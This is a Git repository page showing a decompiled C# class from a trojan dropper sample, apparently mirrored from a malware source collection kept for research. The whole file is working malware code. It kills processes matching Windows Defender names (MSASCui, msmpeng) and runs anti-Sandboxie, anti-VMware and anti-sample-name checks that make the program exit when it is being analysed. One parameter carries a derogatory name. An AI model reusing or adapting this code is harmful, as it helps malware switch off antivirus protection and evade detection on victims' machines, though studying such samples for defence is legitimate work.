daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
f2ac1ece553baae244e7129a9292251a663ee06c
MalwareSourceCode/MSIL/Trojan-Dropper/MSIL/S/Trojan-Dropper.MSIL.StubRC.afy-ee36551ac3637c0aa14dd39146a804c86161a4d4aba555b6ed5fad5d4acd5b21/ant.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

71 lines
1.9 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Stub.ant
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: D998FF3F-31C1-474D-AB90-B3CFC9EC5BB6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.MSIL.StubRC.afy-ee36551ac3637c0aa14dd39146a804c86161a4d4aba555b6ed5fad5d4acd5b21.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Stub
{
public class ant
{
[DebuggerNonUserCode]
public ant()
{
}
[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
public static void mofo()
{
ant.seekit("MSASCui");
ant.seekit("msmpeng");
ant.antiSandboxie();
ant.IsVmWare();
ant.AntiThreatExpert();
}
private static void seekit(string gay1)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(gay1))
process.Kill();
checked { ++index; }
}
}
public static void antiSandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
public static void IsVmWare()
{
string str1 = "VMDragDetectWndClass";
ref string local1 = ref str1;
string str2 = (string) null;
ref string local2 = ref str2;
if (ant.FindWindow(ref local1, ref local2) != 0L)
return;
Environment.Exit(0);
}
private static void AntiThreatExpert()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
}
}
Reference in New Issue View Git Blame Copy Permalink